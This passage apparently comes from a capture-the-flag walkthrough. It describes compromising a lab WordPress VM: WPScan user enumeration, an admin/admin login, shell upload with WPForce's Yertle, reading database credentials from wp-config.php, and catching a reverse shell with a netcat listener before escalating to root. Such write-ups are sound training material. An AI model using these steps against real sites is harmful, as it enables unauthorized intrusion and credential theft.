No directory called hackers but there is a Wordpress blog :p
Naturally, I ran Wpscan, and it found 2 usernames:
[+] Enumerating usernames ...
[+] We identified the following 2 users:
| ID | Login | Name |
| 1 | admin | admin |
| 2 | wpuser | wpuser |
A prelimiary check for default credentials actually revealed the password for the admin user is..you will never guess it..admin! For receiving a shell, I wanted to try a new tool: WPForce!
WPForce is a suite of Wordpress Attack tools. Currently this contains 2 scripts – WPForce, which
brute forces logins via the API, and Yertle, which uploads shells once admin credentials have been
found. Yertle also contains a number of post exploitation modules.
Time to snoop around! I was able to read /var/www/wordpress/wp-config.php and inside found credentials for the SQL database:
/** MySQL database username */
/** MySQL database password */
I also found a flag inside wpadmin’s home directory:
os-shell> cat /home/wpadmin/flag.txt
Sent command: cat /home/wpadmin/flag.txt
I found the shell I had pretty restrictive so I used Yertle to get a reverse shell that I could upgrade:
IP Address: 192.168.217.132
Sending reverse shell to 192.168.217.132 port 8888
And on my listener side:
nc -lnvp 8888
listening on [any] 8888 ...
connect to [192.168.217.132] from (UNKNOWN) [192.168.217.145] 50713
bash: no job control in this shell
I used Python to spawn a TTY and then I tried the root credentials for a pleasant surprise. They are the actual credentials of the root user!